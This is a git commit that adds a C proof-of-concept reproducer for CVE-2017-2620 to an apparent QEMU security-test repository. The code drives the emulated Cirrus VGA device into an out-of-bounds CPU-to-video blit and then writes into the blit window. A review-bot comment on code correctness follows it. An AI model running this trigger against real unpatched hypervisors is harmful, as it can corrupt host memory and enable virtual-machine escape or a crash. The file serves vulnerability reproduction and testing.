authorGerd Hoffmann <kraxel@redhat.com>2017-02-09 16:00:18 +0100
committerGerd Hoffmann <kraxel@redhat.com>2017-02-21 13:23:42 +0100
commitf53c7f3a5d31e94e0e9470cc24453ed73c35eccb (patch)
treea87519c8247603855b9416c3e1dc946aa0e7fd3c /cve-2017-2620.c
parent7586f669b31a2a758f765eb0863176e3e7a27822 (diff)
downloadqemu-security-f53c7f3a5d31e94e0e9470cc24453ed73c35eccb.tar.gz
add cve-2017-2620.c
Diffstat (limited to 'cve-2017-2620.c')
-rw-r--r--cve-2017-2620.c53
1 files changed, 53 insertions, 0 deletions
diff --git a/cve-2017-2620.c b/cve-2017-2620.c
new file mode 100644
index 0000000..e9fb50f
--- /dev/null
+++ b/cve-2017-2620.c
@@ -0,0 +1,53 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+#include <unistd.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sys/io.h>
+#include <sys/mman.h>
+
+#include "pci.h"
+#include "cirrus.h"
+
+int main(int argc, char *argv[])
+{
+ volatile uint8_t *mmio, *blit;
+ int i;
+
+ find_device("cirrus", 0x1013, 0x00b8);
+ mmio = mmap_bar(1);
+ blit = mmap_bar(0);
+ fprintf(stderr, "init ok\n");
+ sleep(1);
+
+ cirrus_setmode(mmio);
+
+ fprintf(stderr, "trying invalid cpu-to-video blit\n");
+ mmio[BLT_OFFSET + CIRRUS_MMIO_BLTSTATUS] = CIRRUS_BLT_RESET;
+ mmio[BLT_OFFSET + CIRRUS_MMIO_BLTSTATUS] = 0x00;
+
+ *(uint16_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTWIDTH) = 1024 * 3 - 1;
+ *(uint16_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTHEIGHT) = 1 - 1;
+ *(uint16_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTDESTPITCH) = 1024 * 3;
+ *(uint16_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTSRCPITCH) = 1024 * 3;
+ *(uint32_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTDESTADDR) = 16 * 1024 * 1024 - 1;
+ *(uint32_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTSRCADDR) = 0;
+
+ mmio[BLT_OFFSET + CIRRUS_MMIO_BLTMODE] =
+ CIRRUS_BLTMODE_PIXELWIDTH24 | CIRRUS_BLTMODE_MEMSYSSRC;
+ mmio[BLT_OFFSET + CIRRUS_MMIO_BLTROP] = CIRRUS_ROP_SRC;
+ mmio[BLT_OFFSET + CIRRUS_MMIO_BLTMODEEXT] = 0;
+ mmio[BLT_OFFSET + CIRRUS_MMIO_BLTSTATUS] = CIRRUS_BLT_START;
+
+ fprintf(stderr, "setup done\n");
+ sleep(1);
+
+ for (i = 0; i < 16384; i++)
+ blit[i] = 0;
+ fprintf(stderr, "blit done\n");
+ sleep(1);
+
+ exit(0);
+}
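Review bot: The 16- and 32-bit register writes starting at `*(uint16_t*)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTWIDTH)` cast the `volatile uint8_t *` to a non-volatile pointer, so the compiler may reorder or merge those MMIO stores relative to the surrounding volatile byte writes to BLTSTATUS/BLTMODE; writing them as `*(volatile uint16_t *)(mmio + BLT_OFFSET + CIRRUS_MMIO_BLTWIDTH) = 1024 * 3 - 1;` (and `volatile uint32_t` for the address registers) keeps the programming order the test relies on. The values returned by `mmap_bar(1)` and `mmap_bar(0)` are used without a failure check; their contract lives in the out-of-view pci.h, so this is inferred, but if they can return NULL or MAP_FAILED a missing device or permission problem becomes a segfault instead of a diagnostic. A one-line header comment, e.g. `/* Reproducer for CVE-2017-2620: programs a cirrus cpu-to-video blit with out-of-range width/dest address; needs the 1013:00b8 device and the pci.h/cirrus.h helpers. */`, would tell readers of the corpus what the file exercises and what it depends on.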